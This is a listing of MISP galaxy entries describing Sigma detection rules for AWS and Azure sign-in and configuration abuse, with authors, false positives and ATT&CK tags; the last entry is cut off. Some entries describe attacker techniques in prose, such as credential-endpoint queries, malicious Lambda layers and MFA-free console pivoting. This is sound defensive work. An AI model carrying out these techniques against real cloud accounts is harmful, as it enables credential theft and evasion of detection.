logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1556']
Related clusters

To see the related clusters, click here.

AWS STS GetSessionToken Misuse

Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.

Internal MISP references

UUID b45ab1d2-712f-4f01-a751-df3826969807 which can be used as unique global reference for AWS STS GetSessionToken Misuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_sts_getsessiontoken_misuse.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1548', 'attack.t1550', 'attack.t1550.001']
Related clusters

To see the related clusters, click here.

AWS ECS Task Definition That Queries The Credential Endpoint

Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.

Internal MISP references

UUID b94bf91e-c2bf-4047-9c43-c6810f43baad which can be used as unique global reference for AWS ECS Task Definition That Queries The Credential Endpoint in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Darin Smith
creation_date 2022/06/07
falsepositive ['Task Definition being modified to request credentials from the Task Metadata Service for valid reasons']
filename aws_ecs_task_definition_cred_endpoint_query.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1525']
Related clusters

To see the related clusters, click here.

AWS IAM S3Browser LoginProfile Creation

Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.

Internal MISP references

UUID db014773-b1d3-46bd-ba26-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser LoginProfile Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 Browser for IAM LoginProfile listing and/or creation']
filename aws_iam_s3browser_loginprofile_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.persistence', 'attack.t1059.009', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

AWS GuardDuty Important Change

Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.

Internal MISP references

UUID 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 which can be used as unique global reference for AWS GuardDuty Important Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/11
falsepositive ['Valid change in the GuardDuty (e.g. to ignore internal scanners)']
filename aws_guardduty_disruption.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

AWS Attached Malicious Lambda Layer

Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls. This would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.

Internal MISP references

UUID 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d which can be used as unique global reference for AWS Attached Malicious Lambda Layer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/23
falsepositive ['Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_attached_malicious_lambda_layer.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation']

AWS Route 53 Domain Transfer Lock Disabled

Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.

Internal MISP references

UUID 3940b5f1-3f46-44aa-b746-ebe615b879e0 which can be used as unique global reference for AWS Route 53 Domain Transfer Lock Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic, Austin Songer @austinsonger
creation_date 2021/07/22
falsepositive ['A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_route_53_domain_transferred_lock_disabled.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.credential_access', 'attack.t1098']
Related clusters

To see the related clusters, click here.

AWS EFS Fileshare Modified or Deleted

Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.

Internal MISP references

UUID 25cb1ba1-8a19-4a23-a198-d252664c8cef which can be used as unique global reference for AWS EFS Fileshare Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename aws_efs_fileshare_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact']

AWS Console GetSigninToken Potential Abuse

Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.

Internal MISP references

UUID f8103686-e3e8-46f3-be72-65f7fcb4aa53 which can be used as unique global reference for AWS Console GetSigninToken Potential Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Chester Le Bron (@123Le_Bron)
creation_date 2024/02/26
falsepositive ['GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated.']
filename aws_console_getsignintoken.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.t1021.007', 'attack.t1550.001']
Related clusters

To see the related clusters, click here.

AWS Glue Development Endpoint Activity

Detects possible suspicious glue development endpoint activity.

Internal MISP references

UUID 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 which can be used as unique global reference for AWS Glue Development Endpoint Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/03
falsepositive ['Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_passed_role_to_glue_development_endpoint.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation']

AWS Root Credentials

Detects AWS root account usage

Internal MISP references

UUID 8ad1600d-e9dc-4251-b0ee-a65268f29add which can be used as unique global reference for AWS Root Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html']
filename aws_root_account_usage.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.privilege_escalation', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

AWS IAM S3Browser User or AccessKey Creation

Detects S3 Browser utility creating IAM User or AccessKey.

Internal MISP references

UUID db014773-d9d9-4792-91e5-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser User or AccessKey Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 Browser for IAM User and/or AccessKey creation']
filename aws_iam_s3browser_user_or_accesskey_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.persistence', 'attack.t1059.009', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

AWS Config Disabling Channel/Recorder

Detects AWS Config Service disabling

Internal MISP references

UUID 07330162-dba1-4746-8121-a9647d49d297 which can be used as unique global reference for AWS Config Disabling Channel/Recorder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['Valid change in AWS Config Service']
filename aws_config_disable_recording.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

AWS ElastiCache Security Group Created

Detects when an ElastiCache security group has been created.

Internal MISP references

UUID 4ae68615-866f-4304-b24b-ba048dfa5ca7 which can be used as unique global reference for AWS ElastiCache Security Group Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_elasticache_security_group_created.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1136', 'attack.t1136.003']
Related clusters

To see the related clusters, click here.

AWS S3 Bucket Versioning Disable

Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.

Internal MISP references

UUID a136ac98-b2bc-4189-a14d-f0d0388e57a7 which can be used as unique global reference for AWS S3 Bucket Versioning Disable in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Johnstone
creation_date 2023/10/28
falsepositive ['AWS administrator legitimately disabling bucket versioning']
filename aws_disable_bucket_versioning.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Too Many Global Admins

Identifies an event where there are there are too many accounts assigned the Global Administrator role.

Internal MISP references

UUID 7bbc309f-e2b1-4eb1-8369-131a367d67d3 which can be used as unique global reference for Too Many Global Admins in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if threshold setting in PIM is too low.']
filename azure_pim_too_many_global_admins.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Are Not Being Used

Identifies when a user has been assigned a privilege role and are not using that role.

Internal MISP references

UUID 8c6ec464-4ae4-43ac-936a-291da66ed13d which can be used as unique global reference for Roles Are Not Being Used in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if potential generic account that cannot be removed.']
filename azure_pim_role_not_used.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Activated Too Frequently

Identifies when the same privilege role has multiple activations by the same user.

Internal MISP references

UUID 645fd80d-6c07-435b-9e06-7bc1b5656cba which can be used as unique global reference for Roles Activated Too Frequently in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate where if active time period for a role is set too short.']
filename azure_pim_role_frequent_activation.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Invalid PIM License

Identifies when an organization doesn't have the proper license for PIM and is out of compliance.

Internal MISP references

UUID 58af08eb-f9e1-43c8-9805-3ad9b0482bd8 which can be used as unique global reference for Invalid PIM License in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if licenses have expired.']
filename azure_pim_invalid_license.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Activation Doesn't Require MFA

Identifies when a privilege role can be activated without performing mfa.

Internal MISP references

UUID 94a66f46-5b64-46ce-80b2-75dcbe627cc0 which can be used as unique global reference for Roles Activation Doesn't Require MFA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if user is performing MFA at sign-in.']
filename azure_pim_role_no_mfa_required.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Roles Assigned Outside PIM

Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.

Internal MISP references

UUID b1bc08d1-8224-4758-a0e6-fbcfc98c73bb which can be used as unique global reference for Roles Assigned Outside PIM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.']
filename azure_pim_role_assigned_outside_of_pim.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Stale Accounts In A Privileged Role

Identifies when an account hasn't signed in during the past n number of days.

Internal MISP references

UUID e402c26a-267a-45bd-9615-bd9ceda6da85 which can be used as unique global reference for Stale Accounts In A Privileged Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/14
falsepositive ['Investigate if potential generic account that cannot be removed.']
filename azure_pim_account_stale.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Use of Legacy Authentication Protocols

Alert on when legacy authentication has been used on an account

Internal MISP references

UUID 60f6535a-760f-42a9-be3f-c9a0a025906e which can be used as unique global reference for Use of Legacy Authentication Protocols in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/17
falsepositive ['User has been put in acception group so they can use legacy authentication']
filename azure_legacy_authentication_protocols.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Sign-in Failure Due to Conditional Access Requirements Not Met

Define a baseline threshold for failed sign-ins due to Conditional Access failures

Internal MISP references

UUID b4a6d707-9430-4f5f-af68-0337f52d5c42 which can be used as unique global reference for Sign-in Failure Due to Conditional Access Requirements Not Met in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/01
falsepositive ['Service Account misconfigured', 'Misconfigured Systems', 'Vulnerability Scanners']
filename azure_conditional_access_failure.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1110', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Applications That Are Using ROPC Authentication Flow

Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.

Internal MISP references

UUID 55695bc0-c8cf-461f-a379-2535f563c854 which can be used as unique global reference for Applications That Are Using ROPC Authentication Flow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/01
falsepositive ['Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow']
filename azure_app_ropc_authentication.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

User Access Blocked by Azure Conditional Access

Detect access has been blocked by Conditional Access policies. The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.

Internal MISP references

UUID 9a60e676-26ac-44c3-814b-0c2a8b977adf which can be used as unique global reference for User Access Blocked by Azure Conditional Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_user_login_blocked_by_conditional_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.initial_access', 'attack.t1110', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Increased Failed Authentications Of Any Type

Detects when sign-ins increased by 10% or greater.

Internal MISP references

UUID e1d02b53-c03c-4948-b11d-4d00cca49d03 which can be used as unique global reference for Increased Failed Authentications Of Any Type in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'
creation_date 2022/08/11
falsepositive ['Unlikely']
filename azure_ad_auth_failure_increase.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Users Authenticating To Other Azure AD Tenants

Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.

Internal MISP references

UUID 5f521e4b-0105-4b72-845b-2198a54487b9 which can be used as unique global reference for Users Authenticating To Other Azure AD Tenants in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/06/30
falsepositive ['If this was approved by System Administrator.']
filename azure_users_authenticating_to_other_azure_ad_tenants.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Authentications To Important Apps Using Single Factor Authentication

Detect when authentications to important application(s) only required single-factor authentication

Internal MISP references

UUID f272fb46-25f2-422c-b667-45837994980f which can be used as unique global reference for Authentications To Important Apps Using Single Factor Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_auth_to_important_apps_using_single_factor_auth.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Measurable Increase Of Successful Authentications

Detects when successful sign-ins increased by 10% or greater.

Internal MISP references

UUID 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae which can be used as unique global reference for Measurable Increase Of Successful Authentications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
creation_date 2022/08/11
falsepositive ['Increase of users in the environment']
filename azure_ad_auth_sucess_increase.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Successful Authentications From Countries You Do Not Operate Out Of

Detect successful authentications from countries you do not operate out of.

Internal MISP references

UUID 8c944ecb-6970-4541-8496-be554b8e2846 which can be used as unique global reference for Successful Authentications From Countries You Do Not Operate Out Of in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Potential MFA Bypass Using Legacy Client Authentication

Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.

Internal MISP references

UUID 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc which can be used as unique global reference for Potential MFA Bypass Using Legacy Client Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/03/20
falsepositive ['Known Legacy Accounts']
filename azure_ad_suspicious_signin_bypassing_mfa.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Device Registration or Join Without MFA

Monitor and alert for device registration or join events where MFA was not performed.

Internal MISP references

UUID 5afa454e-030c-4ab4-9253-a90aa7fcc581 which can be used as unique global reference for Device Registration or Join Without MFA in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_device_registration_or_join_without_mfa.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Discovery Using AzureHound

Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.

Internal MISP references

UUID 35b781cc-1a08-4a5a-80af-42fd7c315c6b which can be used as unique global reference for Discovery Using AzureHound in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/11/27
falsepositive ['Unknown']
filename azure_ad_azurehound_discovery.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.discovery', 'attack.t1087.004', 'attack.t1526']
Related clusters

To see the related clusters, click here.

Account Lockout

Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.

Internal MISP references

UUID 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a which can be used as unique global reference for Account Lockout in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_account_lockout.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Sign-ins by Unknown Devices

Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.

Internal MISP references

UUID 4d136857-6a1a-432a-82fc-5dd497ee5e7c which can be used as unique global reference for Sign-ins by Unknown Devices in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_sign_ins_from_unknown_devices.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Multifactor Authentication Interrupted

Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.

Internal MISP references

UUID 5496ff55-42ec-4369-81cb-00f417029e25 which can be used as unique global reference for Multifactor Authentication Interrupted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_mfa_interrupted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110', 'attack.t1621']
Related clusters

To see the related clusters, click here.

Multifactor Authentication Denied

User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.

Internal MISP references

UUID e40f4962-b02b-4192-9bfe-245f7ece1f99 which can be used as unique global reference for Multifactor Authentication Denied in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2022/03/24
falsepositive ['Users actually login but miss-click into the Deny button when MFA prompt.']
filename azure_mfa_denies.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110', 'attack.t1621']
Related clusters

To see the related clusters, click here.

Failed Authentications From Countries You Do Not Operate Out Of

Detect failed authentications from countries you do not operate out of.

Internal MISP references

UUID 28870ae4-6a13-4616-bd1a-235a7fad7458 which can be used as unique global reference for Failed Authentications From Countries You Do Not Operate Out Of in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/28
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Login to Disabled Account

Detect failed attempts to sign in to disabled accounts.

Internal MISP references

UUID 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 which can be used as unique global reference for Login to Disabled Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ
creation_date 2021/10/10
falsepositive ['Unknown']
filename azure_login_to_disabled_account.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Suspicious SignIns From A Non Registered Device

Detects risky authencaition from a non AD registered device without MFA being required.

Internal MISP references

UUID 572b12d4-9062-11ed-a1eb-0242ac120002 which can be used as unique global reference for Suspicious SignIns From A Non Registered Device in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/01/10
falsepositive ['Unknown']
filename azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Azure AD Only Single Factor Authentication Required

Detect when users are authenticating without MFA being required.

Internal MISP references

UUID 28eea407-28d7-4e42-b0be-575d5ba60b2c which can be used as unique global reference for Azure AD Only Single Factor Authentication Required in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author MikeDuddington, '@dudders1'
creation_date 2022/07/27
falsepositive ['If this was approved by System Administrator.']
filename azure_ad_only_single_factor_auth_required.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1078.004', 'attack.t1556.006']
Related clusters

To see the related clusters, click here.

Sign-ins from Non-Compliant Devices

Monitor and alert for sign-ins where the device was non-compliant.

Internal MISP references

UUID 4f77e1d7-3982-4ee0-8489-abf2d6b75284 which can be used as unique global reference for Sign-ins from Non-Compliant Devices in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Epping, '@mepples21'
creation_date 2022/06/28
falsepositive ['Unknown']
filename azure_ad_sign_ins_from_noncompliant_devices.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Azure Unusual Authentication Interruption

Detects when there is a interruption in the authentication process.

Internal MISP references

UUID 8366030e-7216-476b-9927-271d79f13cf3 which can be used as unique global reference for Azure Unusual Authentication Interruption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['Unknown']
filename azure_unusual_authentication_interruption.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Application Using Device Code Authentication Flow

Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.

Internal MISP references

UUID 248649b7-d64f-46f0-9fb2-a52774166fb5 which can be used as unique global reference for Application Using Device Code Authentication Flow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
creation_date 2022/06/01
falsepositive ['Applications that are input constrained will need to use device code flow and are valid authentications.']
filename azure_app_device_code_authentication.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1078', 'attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.initial_access']
Related clusters

To see the related clusters, click here.

Account Disabled or Blocked for Sign in Attempts

Detects when an account is disabled or blocked for sign in but tried to log in

Internal MISP references

UUID 4afac85c-224a-4dd7-b1af-8da40e1c60bd which can be used as unique global reference for Account Disabled or Blocked for Sign in Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Yochana Henderson, '@Yochana-H'
creation_date 2022/06/17
falsepositive ['Account disabled or blocked in error', 'Automation account has been blocked or disabled']
filename azure_blocked_account_attempt.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

Password Spray Activity

Indicates that a password spray attack has been successfully performed.

Internal MISP references

UUID 28ecba0a-c743-4690-ad29-9a8f6f25a6f9 which can be used as unique global reference for Password Spray Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.']
filename azure_identity_protection_password_spray.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1110', 'attack.credential_access']
Related clusters

To see the related clusters, click here.

Suspicious Inbox Manipulation Rules

Detects suspicious rules that delete or move messages or folders are set on a user's inbox.

Internal MISP references

UUID ceb55fd0-726e-4656-bf4e-b585b7f7d572 which can be used as unique global reference for Suspicious Inbox Manipulation Rules in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
creation_date 2023/09/03
falsepositive ['Actual mailbox rules that are moving items based on their workflow.']
filename azure_identity_protection_inbox_manipulation.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.t1140', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Anonymous IP Address

Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.

Internal MISP references

